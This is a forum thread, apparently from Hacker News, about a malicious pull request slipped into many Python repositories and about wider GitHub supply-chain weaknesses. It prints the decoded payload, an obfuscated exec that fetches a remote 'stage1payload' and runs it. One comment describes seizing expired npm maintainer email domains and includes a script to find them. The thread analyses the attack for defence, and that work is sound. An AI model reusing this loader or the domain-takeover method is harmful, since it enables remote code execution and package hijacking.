GitHub repos of mine are seeing an uptick in strange PRs that may be attacks. But the article's PR doesn't look innocent at all; it's more akin to a huge, dangerous red flag.
If any GitHub teammates are reading here, open source repo maintainers (including me) really need better/stronger tools for potentially risky PRs and contributors.
In order of importance IMHO:
1. Throttle PRs for new participants. For example, why is a new account able to send the same kinds of PRs to so many repos, and all at the same time?
2. Help a repo owner confirm that a new PR author is human and legit. For example, when a PR author submits their first PR to a repo, can the repo automatically do some kind of challenge such as a captcha prompt, or email confirmation, or multi-factor authentication, etc.?
3. Create cross-repo, cross-organization flagging for risky PRs. For example, when a repo owner sees a questionable PR, currently they can report it to GitHub staff, but that takes quite a while; instead, what if a repo owner could flag a PR as questionable, which in turn would propagate cautionary flags onto similar PRs or similar author activity?
GitHub needs to step up its security game in general. 2FA should be made mandatory. GitHub Actions are a catastrophe waiting to happen: very few people pin Actions to a specific commit; most use a tag of the Action, which can be moved at will. A malicious author could instantaneously compromise thousands of pipelines with a single commit. Also, PR diffs often hide entire files by default - why!?!
Maybe accounts should even require ID verification. We can't afford to fuck around anymore, a significant share of the world's software supply chain lives on GitHub. It's time to take things seriously.
The rampant "@V1" usage for GitHub Actions has always been so disturbing to me. Even better is the fact that GitHub does all of the work of showing you who is actually using the action! So just compromise the account and then start searching for workflows with authenticated web tokens to AWS or something similar.
It's probably already happening.
Not that long ago, Facebook was accidentally leaking information via their self-hosted runners, due to a very common mistake people make. https://johnstawinski.com/2024/01/11/playing-with-fire-how-w...
That's the second time for PyTorch, to the best of my knowledge. I know someone who found that (or something very much like it) back in 2022 and reported it, as I had to help him escalate through a relevant security contact I had at Meta.
Exactly.
This simply should not be allowed. Nor should anyone be able to maintain Actions without mandatory 2FA. All it takes is one compromised account to infect thousands of pipelines. Thousands of pipelines can be used to infect thousands of repos. Thousands of repos can be used to infect thousands of accounts... ad infinitum.
2FA matters very little when you have never-expiring tokens.
2FA also matters little if the attacker has compromised your machine. They can use your 2FA-authenticated session.
Only once… but if they can get your forever token… that's not the same.
Once is enough.
And thanks to the likes of Composer and similar tooling, devs end up making non-expiring tokens to reduce the annoyance. There needs to be a better system. Having to manually generate a token for tooling can be a drag.
GitHub specifically recommended that you have v1, v1.x, and v1.x.x tags.
When you go from v1.5.3 to v1.5.4, you make v1.5 and v1 point to v1.5.4.
The point is that any of those tags can be replaced maliciously, after the fact.
If tags are the way people want to work, then there needs to be a new repo class for actions which explicitly removes the ability to delete or force push tags across all branches. And enforced 2FA.
Using a commit hash is the second most secure option (a rough sketch of resolving a tag to its current commit is below). The first (in my eyes) is vendoring the actions you want to use into your user/org's namespace. Deciding yourself when/if to sync or backport upstream modifications protects against these kinds of attacks.
However, this does depend on the repo being vetted ahead of time, before being vendored.
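A minimal sketch of that first step in Python (assumes the git CLI is installed; the repo and tag here are just examples) - resolve whatever the tag currently points to, then pin the full SHA in the workflow instead of the movable tag:

    # Resolve what a remote tag currently points to, so a workflow can pin the
    # full commit SHA instead of the movable tag. Repo/tag below are examples.
    import subprocess

    def tag_to_sha(repo_url: str, tag: str) -> str:
        out = subprocess.run(
            ["git", "ls-remote", repo_url, f"refs/tags/{tag}"],
            check=True, capture_output=True, text=True,
        ).stdout
        sha = ""
        for line in out.splitlines():
            commit, ref = line.split("\t")
            # Annotated tags also list a peeled "<tag>^{}" entry that names the
            # underlying commit; prefer it when present.
            if ref.endswith("^{}") or not sha:
                sha = commit
        return sha

    # Pin this SHA in `uses:` and only bump it deliberately.
    print(tag_to_sha("https://github.com/actions/checkout", "v4"))

Re-running the same lookup later also tells you immediately whether the tag has been moved.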
Sorry I followed up to this point - how can this be done?
From the GitHub UI, very simply. Go to a repo you administer; on the /tags page, each tag has a "..." drop-down menu with a delete option. Then upload a new tag by that name.
Tags are not automatically updated from remotes on pull (they are automatically created locally if it's a new tag). This doesn't mean that the remote can't change what the tag points to, only that it's easy to spot.
Edit: and to be clear, for many years after release, this was the recommendation from the Visual Source Safe team (yes, that team developed GitHub Actions) for managing your actions: tell people to use "v1", then delete and recreate the tag each time.
Ah - is the problem a malicious administrator of the repo you're pulling from?
Yes, exactly that. Or anyone who hacks their Github account.
And even if you pin your actions, if they're Docker actions, the author can replace the Docker container at that label:
https://github.com/rust-build/rust-build.action/blob/59be2ed...
Also the heuristic used to collapse file diffs makes it so that the most important change in a PR often can't be seen or ctrl-f'd without clicking first.
Blame it on go dependency lists and similar.
What do you even review when it's one of those? There's thousands of lines changed and they all point to commits on other repositories.
You're essentially hoping it's fine.
Shipping code to production without evidence anyone credible has reviewed it at a minimum is negligence.
You're claiming here that you do a review of all of your dependencies?
I've always considered the wider point to be that viewing diffs inline is a laziness-inducing anti-pattern in development: if you never actually bring the code to your machine, you don't quite feel like it's "real" (i.e. even if it's not a full test, compiling and running it yourself should be something that happens; if that feels uncomfortable... then maybe there's a reason).
2FA is already mandatory on GitHub.
Seems I missed that change, thanks.
It only happened in the last month or so I think.
Nah. A year maybe?
Six days for me:
>Your account meets this criteria, and you will need to enroll in 2FA within 45 days, by November 8th, 2024 at 00:00 (UTC). After this date, your access to GitHub.com will be limited until you enroll in 2FA. Enrolling is easy, and we support several options, starting with TOTP apps and text messages (SMS) and then adding on passkeys and the GitHub Mobile app.
I think the exact deadline depends on the organisation. I know that I only enabled 2FA for my throwaway work account (we don't use github at work, and I didn't want to comment using my personal one) last week.
Lucky you :D
I was talking about non-work accounts that don't belong to organizations. Mine got forced to use 2fa a long time ago.
What's next, checking that Releases match the code on Github?
With what, a reproducible build? Madness! Madness I say!
Having a reproducible build does not prove that the tarball contains the same source as git.
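Right, which is why the tarball-vs-tag comparison has to be its own check. A rough sketch of that comparison (filenames and the tag are placeholders; release tarballs often legitimately contain extra generated files, so any differences still need human judgment):

    # Compare files in a downloaded release tarball against `git archive` of the
    # corresponding tag. Differences aren't automatically malicious (generated
    # autotools files, docs), but this is exactly where the xz backdoor hid.
    import hashlib, io, subprocess, tarfile

    def tar_digests(data: bytes) -> dict:
        digests = {}
        with tarfile.open(fileobj=io.BytesIO(data), mode="r:*") as tf:
            for m in tf.getmembers():
                if m.isfile():
                    name = m.name.split("/", 1)[-1]  # drop "project-1.2.3/" prefix
                    digests[name] = hashlib.sha256(tf.extractfile(m).read()).hexdigest()
        return digests

    release = tar_digests(open("project-1.2.3.tar.gz", "rb").read())  # the published tarball
    from_git = tar_digests(subprocess.run(
        ["git", "-C", ".", "archive", "--format=tar", "v1.2.3"],
        check=True, capture_output=True).stdout)

    for path in sorted(set(release) | set(from_git)):
        if release.get(path) != from_git.get(path):
            print("DIFFERS:", path)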
SLSA aims to achieve this, though, right? Specifically going from level 2 to level 3.
TL;DR: Why not add a capability/permissions model to CI?
I agree that pinning commits is reasonable and that GitHub's UI and Actions system are awful. However, you said:
> Maybe accounts should even require ID verification
This would worsen the following problems:
1. GitHub actions are seen as "trustworthy"
2. GitHub Actions lack granular permissions that default to "no"
3. Rising incentives to attempt developer machine compromise, including via $5 wrench[1]
4. Risk of identity information being stolen via breach
> It's time to take things seriously.
Why not add strong capability models to CI? We have SEGFAULT for programs, right? Let's expand on the idea. Stop an action run when:
* an action attempts unexpected network access (rough sketch after this list)
* an action attempts IO on unexpected files or folders
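A minimal sketch of what that first check could look like inside a Python CI step - purely hypothetical (the allowlist and hosts are made up, and this is not a GitHub Actions feature); real enforcement would have to live outside the process (network namespaces, firewall rules), since in-process hooks are trivially bypassable:

    # Hypothetical deny-by-default egress policy for a CI step: name resolution
    # for any host not on the allowlist fails fast. Illustrative only.
    import socket

    ALLOWED_HOSTS = {"pypi.org", "files.pythonhosted.org"}  # example allowlist

    _real_getaddrinfo = socket.getaddrinfo

    def _guarded_getaddrinfo(host, *args, **kwargs):
        if host not in ALLOWED_HOSTS:
            raise PermissionError(f"CI policy: unexpected network access to {host!r}")
        return _real_getaddrinfo(host, *args, **kwargs)

    socket.getaddrinfo = _guarded_getaddrinfo
    # From here on, code trying to reach an exfiltration domain raises instead of connecting.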
The US DoD and related organizations seem to like enforcing this at the compiler level. For example, Ada's got:
* a heavily contract-based approach[2] for function preconditions
* pragma capabilities to forbid using certain features in a module
Other languages have inherited similar ideas in weaker forms, and I mean more than just Rust's borrow checker. Even C# requires explicit declaration to accept null values as arguments [3].
Some languages are taking a stronger approach. For example, Gren's[4] developers are considering the following for IO:
1. you need to have permission to access the disk and other devices
2. permissions default to no
> We can't afford to fuck around anymore,
Sadly, the "industry" seems to disagree with us here. Do you remember when:
1. Microsoft tried to ship 99% of a credit card number and SSN exfiltration tool[5] as a core OS component?
2. BSoD-as-service stopped global air travel?
It seems like a great time to be selling better CI solutions. ¯\_(ツ)_/¯
[2]: https://learn.adacore.com/courses/intro-to-ada/chapters/cont...
[3]: https://learn.microsoft.com/en-us/dotnet/csharp/language-ref...
[5]: https://arstechnica.com/ai/2024/06/windows-recall-demands-an...
When I saw the screenshot I almost laughed out loud at the thought that anyone would say this is innocent looking.
It looked like a PR stunt
Yeah, the guy is literally named evildojo.
And then a 666 to boot, I mean gosh. Bad news.
> 2. Help a repo owner confirm that a new PR author is human and legit. For example, when a PR author submits their first PR to a repo, can the repo automatically do some kind of challenge such as a captcha prompt, or email confirmation, or multi-factor authentication, etc.?
Just do a blue-checkmark thing by tying the account to a real-world identity (eIDAS etc.). It's not rocket science; there are a gazillion providers that offer this sort of ID check as a service, GitHub would just need to integrate one.
No, this is the exact opposite of what we want. The ability to maintain pseudonymity for maintainers and contributors is paramount for personal safety. We must be able to keep online and meatspace personas separate without compromising the security of software. Stay wary of Worldcoin as the supposed fix for this.
Ah yes I'm sure it's completely impossible to game these services by printing a fake id at home and showing it on the webcam /s
But GitHub gets a higher valuation by having X number of active users. The last thing they want is to make that number drop!
By the way, on GH you can also buy stars for your project from fake accounts.
Step 1: Automatically reject PRs from usernames like "evildojo666"
Your username would suffer from this policy, as would anyone describing themselves as a hacker.
Why though
It's someone attempting to set up/frame someone else.
That makes a lot more sense than the headline. It doesn't look like a serious attempt and is not well obfuscated.
triple false-flags to sow/reap FUD
How is that innocent looking? exec(''.join(chr(x) for x in [...])) stands out like a sore thumb.
The username is literally "evildojo666"
It's not, I think the headline is for clicks and engagement.
Looks like he accidentally added a file. It's not "innocent", but it's definitely disguised by appearing as a readme-only change.
Even the PR is described as just a docs change
No injection here, purely functional programming
The code in question:
>>> ''.join(chr(x) for x in [105,109,112,111,114,116,32,111,115,10,105,109,112,111,114,116,32,117,114,108,108,105,98,10,105,109,112,111,114,116,32,117,114,108,108,105,98,46,114,101,113,117,101,115,116,10,120,32,61,32,117,114,108,108,105,98,46,114,101,113,117,101,115,116,46,117,114,108,111,112,101,110,40,34,104,116,116,112,115,58,47,47,119,119,119,46,101,118,105,108,100,111,106,111,46,99,111,109,47,115,116,97,103,101,49,112,97,121,108,111,97,100,34,41,10,121,32,61,32,120,46,114,101,97,100,40,41,10,122,32,61,32,121,46,100,101,99,111,100,101,40,34,117,116,102,56,34,41,10,120,46,99,108,111,115,101,40,41,10,111,115,46,115,121,115,116,101,109,40,122,41,10])
'import os\nimport urllib\nimport urllib.request\nx = urllib.request.urlopen("https://www.evildojo.com/stage1payload")\ny = x.read()\nz = y.decode("utf8")\nx.close()\nos.system(z)\n'
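The obfuscation is shallow enough that even a crude pre-review scan would flag it; a rough heuristic sketch (the patterns are illustrative, so expect both false positives and trivial evasions):

    # Flag added diff lines that feed exec/eval with chr()-built or decoded
    # strings -- the exact trick used in this PR. A cheap first-pass filter,
    # not a substitute for review.
    import re, sys

    SUSPICIOUS = [
        re.compile(r"\b(exec|eval)\s*\("),
        re.compile(r"chr\(\s*\w+\s*\)\s*for\s+\w+\s+in"),   # ''.join(chr(x) for x in [...])
        re.compile(r"base64\.b64decode|codecs\.decode"),
    ]

    def scan_diff(diff_text: str):
        return [line for line in diff_text.splitlines()
                if line.startswith("+") and any(p.search(line) for p in SUSPICIOUS)]

    if __name__ == "__main__":
        for hit in scan_diff(sys.stdin.read()):      # e.g. pipe a PR diff in
            print("suspicious added line:", hit)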
You ever get offended that the attacker is so obviously incompetent? At least put in the work like the xz attacker.
> At least put in the work like the xz attacker.
There are very few people who can do that.
There are countless people who can do that and don't. There are almost certainly many people actively doing it still today. Thinking that the xz attack was extraordinary or difficult is a very big mistake.
Its news cycle should have conveyed a sense of "oh shit, we really do need to be watching for discreetly malicious contributors," not "whoa, I can't believe there was someone capable of that!" -- it seems like you learned the wrong lesson.
I came to the realization over a year ago that the only thing needed to be an "advanced persistent threat" is an attention span. Not even a long one.
Judging by how many drive-bys a random IPv4 address gets on AWS, GCP, Azure, or Vultr - they get ignored if they get it wrong, and nobody notices until too late if they get it right.
Well, the other take-away is that if somebody can put in the work to do that to hopefully get included into a linux distro; what are they doing to get included into MacOS / Windows?
Well linux distributions can be installed on windows so…
They were targeting OpenSSH servers, not desktops.
I mean people often use desktops to connect to servers.
It's akin to putting an exploit into say some security software. It's probably going to have access to something you care about.
There are many people who could pull off an attack like that if they were so inclined.
You need ability, means (as in -- have the money to spend time on it), and motive. Many people have the ability. Many people have the means. (And there is some overlap, but the overlap isn't that large.) Few people have the motive.
The combination of all three tends to mostly appear in nation states. They have the motive, and they have the money to fund people with the ability to pull off this kind of attack.
Exactly, most of us need to work and aren't motivated enough to spend our free time committing crimes. I also assume this is full time work. From my limited perspective the hardest part was the time investment and gaining enough trust to put the code into action.
Most of the time you can just buy an expired domain name tied to a js include or dependency maintainer email address and you now have arguably -legal- ability to publish any code you want to thousands of orgs.
Plenty of expired npm maintainer email domains right now. Have fun.
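A rough sketch of how to spot them (uses npm's public registry metadata; a failed DNS lookup only suggests the domain might be free, it isn't proof, and plenty of maintainers simply let old domains lapse harmlessly):

    # List a package's maintainer email domains from the npm registry and flag
    # ones that no longer resolve. A signal worth checking with a registrar,
    # nothing more.
    import json, socket, urllib.request

    def maintainer_domains(package: str) -> set:
        with urllib.request.urlopen(f"https://registry.npmjs.org/{package}") as resp:
            meta = json.load(resp)
        return {m["email"].rsplit("@", 1)[-1]
                for m in meta.get("maintainers", []) if "@" in m.get("email", "")}

    for domain in maintainer_domains("left-pad"):   # example package
        try:
            socket.getaddrinfo(domain, None)
            print(domain, "resolves")
        except socket.gaierror:
            print(domain, "does NOT resolve -- worth investigating")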
I have done it twice to bring exposure to the issue. Seemingly no one cares enough to do the most basic things like code signing.
> There are very few people who can do that
You're right. What made the XZ attacker rather unique is that they made useful contributions at first and only turned nasty later on.
Not many people can keep a malicious campaign going for as long as the XZ attacker did, which is why it's suspected to be a nation-backed attack.
Not unique. Bitcoins were stolen with a similar technique: hijacking a JS dependency of some Bitcoin wallet app. It was done by making legitimate contributions at first to gain control of the thing.
They were even better: the library behaved completely normally when used anywhere else.
xz was found because it behaved differently.
I mean, just look at https://milksad.info for what some argue is a very long-game supply chain attack: intentionally bad entropy in the tool recommended in Mastering Bitcoin.
...and the ones who truly can, won't be noticed.
I like how it both indicates that it's evil and that it's a first-stage malicious payload. Very informative.
Did anyone download the payload before it 404'd?
I don't think it ever existed. According to the owner of the site anyway.
That seems pretty clumsy. Even a first year employee would catch that in a code review.
Not sure how the OP describes that as innocent looking.
obfuscated code, check
use of eval, check
How was that innocent looking?
Related. Others?
Threat actor attempted to slipstream a malware payload into yt-dlp's GitHub repo - https://news.ycombinator.com/item?id=42121969 - Nov 2024 (5 comments)
The recently famous one is the XZ Utils takeover...
It's so ham-handed that it reminds me of typical phishing emails, which are supposedly full of misspellings to filter out recipients who notice misspellings and aren't worth the trouble to try to scam.
Maybe it's the hacking equivalent of Schrödinger's douchebag? If the hacking attempt succeeds, then you've achieved your goal. If it fails, then you were obviously joking or doing "research."
Note that if you have a self-hosted runner and any environment variables or execution state are carried over between runs, you should not even reply to or comment on a malicious PR. The reason: if they have a pull_request_review_comment workflow inside the fork...
well, guess what? It bypasses even the "Require approval for all outside collaborators" flag in your repo settings and triggers on your self-hosted runner anyway...
This was brought up in recent BlackHat24:
https://github.com/AdnaneKhan/ConferenceTalks/blob/main/Blac...
And yes - it's another "Github won't fix"
It’s not even subtle. How crude. I guess even the state govs are outsourcing their work to script kiddies
lol this is a troll by someone who hates someone else and is setting them up.
Zero nation-states are involved in this.
Did I miss the evidence that this is state-backed?
This account was spamming Python repositories with the same type of low-value, obvious backdoor spam.[1]
Full list of attempted pull requests (all seemingly deleted by GitHub):
1 https://www.github.com/KurtBestor/Hitomi-Downloader/pull/7638
2 https://www.github.com/home-assistant/core/pull/130423
3 https://www.github.com/celery/celery/pull/9407
4 https://www.github.com/chriskiehl/Gooey/pull/921
5 https://www.github.com/crewAIInc/crewAI/pull/1582
6 https://www.github.com/cumulo-autumn/StreamDiffusion/pull/177
7 https://www.github.com/AUTOMATIC1111/stable-diffusion-webui/pull/16646
8 https://www.github.com/Aider-AI/aider/pull/2343
9 https://www.github.com/aboul3la/Sublist3r/pull/383
10 https://www.github.com/plotly/dash/pull/3073
11 https://www.github.com/soimort/you-get/pull/3034
12 https://www.github.com/streamlink/streamlink/pull/6290
13 https://www.github.com/jumpserver/jumpserver/pull/14440
14 https://www.github.com/junyanz/pytorch-CycleGAN-and-pix2pix/pull/1684
15 https://www.github.com/kornia/kornia/pull/3069
16 https://www.github.com/langflow-ai/langflow/pull/4520
17 https://www.github.com/exo-explore/exo/pull/432
18 https://www.github.com/PostHog/posthog/pull/26144
19 https://www.github.com/PrefectHQ/prefect/pull/15987
20 https://www.github.com/pydantic/pydantic/pull/10822
21 https://www.github.com/pyg-team/pytorch_geometric/pull/9777
22 https://www.github.com/qutebrowser/qutebrowser/pull/8379
23 https://www.github.com/tornadoweb/tornado/pull/3441
24 https://www.github.com/ungoogled-software/ungoogled-chromium/pull/3092
25 https://www.github.com/locustio/locust/pull/2980
26 https://www.github.com/matterport/Mask_RCNN/pull/3057
27 https://www.github.com/Stability-AI/generative-models/pull/425
28 https://www.github.com/yt-dlp/yt-dlp/pull/11520
[1] https://play.clickhouse.com/play?user=play#U0VMRUNUICogRlJPT...
University of Minnesota at it again?
For those who don't get the reference, there was an incident where security research by University of Minnesota students/professors was conducted without communicating or receiving permission from anyone on the Linux side or from the Institutional Review Board (IRB).
It raised a lot of questions about conducting ethical security research on open source projects, whether security research of this nature counts as an "experiment on people" (which has a lot more scrutiny, obviously), etc.
"[...] Lu and Wu explained that they’d been able to introduce vulnerabilities into the Linux kernel by submitting patches that appeared to fix real bugs but also introduced serious problems."
https://cse.umn.edu/cs/linux-incident
https://www.theverge.com/2021/4/30/22410164/linux-kernel-uni...
Yes, really looks like someone conducting a study, or someone who wants to call out projects for their sloppy PR reviews.
I think it looks like someone ham-fistedly pushing a known vulnerability, trying to find one sucker who doesn't know what he's doing. If you're a junior with a learning project, maybe you'd approve the merge.
I moved to codeberg and there's nothing of the sort going on there. Quite relaxing.
On github I did get weird and suspicious contributions.
Can't help but wonder... did anyone bite?
Title is misleading, it's an exec that's not hidden in any way.
Et tu evildojo666?
The hardcover edition of Jurassic Park explained, including screenshots of his IDE, how Dennis Nedry managed to shut off the park security: by disguising a call to the "turn off the fences" code as an innocuous object constructor.
I've heard from Hackernews who read the book and didn't see the IDE screenshots. Maybe the paperback didn't have them.
Another vulnerability of the GitHub monoculture. Attackers wanting to automate attempts to subvert open-source projects only have to focus on one system.
Review all code you ship to production or get burned. Every single dependency.
Security is expensive. Pay for it now or pay more later.
will next account be 667?
That doesn't look innocent in any way.
Anyone who does not review patches before accepting them deserves to suffer the consequences of their laziness.
And what do the people who are actively trying to sabotage repos deserve?
[flagged]
Shunning them and cutting them out will not make them vote in your favor. What's the endgame of this?
What? It has nothing to do with voting. The endgame is to watch Twitter die, hopefully as soon as possible. This way the scum that the current owner not only allows on the platform, but actively promotes in some cases, crawl back into their holes.
I wasn't talking of twitter. I was talking of the people you call trolls and scumbags.
What is your endgame in dealing with them?
I plan to continue calling them what they are (trolls, fascists, Nazis, etc), and pushing for regulation of social media to ensure that their message can’t be amplified.
>wants to regulate speech because you disagree with it
>calls others Nazis and fascists
I am opposed to the government regulating speech, so you got that part wrong; I fully support freedom of speech as it is defined in the US Constitution. Here, I/we are talking about something else, free reach, which no one has a right to and which absolutely should be regulated.
Here's an article with more detailed information if you'd like to educate yourself on the topic: https://www.wired.com/story/free-speech-is-not-the-same-as-f...
I don't need Wired to "educate myself" about internet censorship. It's hilarious that after benefiting for over a decade from left-leaning censorship by platforms, suddenly it's a huge problem when the same platforms supposedly censor the other way. Once again, the solution would be to treat public internet spaces like public spaces in real life, but ofc you wouldn't like that because other people's opinions are literally Hitler :)
I was trying to give you a light/high-level overview of the problem of free reach (which, by the way, I’ve been advocating against for at least a decade if not longer). But if you don’t want to understand the problem beyond “censorship bad,” or respond to what I’m actually saying, I can’t help you. Take care.
Nice try taking the high horse after name-calling and advocating for censorship. Maybe go this way first next time to appear less fascist.
I'm sorry that you feel that way, but I stand by everything I said in all of my previous comments and I'm not attempting to correct, change, or cover up any of it.
Nothing I said previously amounts to advocating for censorship and if you read it that way even after I attempted to clarify, it's your problem, not mine.
If you have any specific questions about anything I said that appears contradictory to you, or if you'd like to discuss what I'm actually advocating for (regulation of free reach), I'm happy to have a discussion about it. If you want to stay angry and uninformed about it, that's your prerogative as well. Have a good day.
Are you sure you won't ever fall out of favor and get denounced as a troll or Nazi yourself? And get suppressed as a result?
> Are you sure you won't ever fall out of favor and get denounced as a troll or Nazi yourself?
Nope, definitely not sure of this.
> And get suppressed as a result?
My position is that unregulated profit-driven social media powered by opaque algorithms is one of the worst things to happen to society in the last several decades, so being “suppressed” on such platforms really has no impact on me, since I don’t use them for much.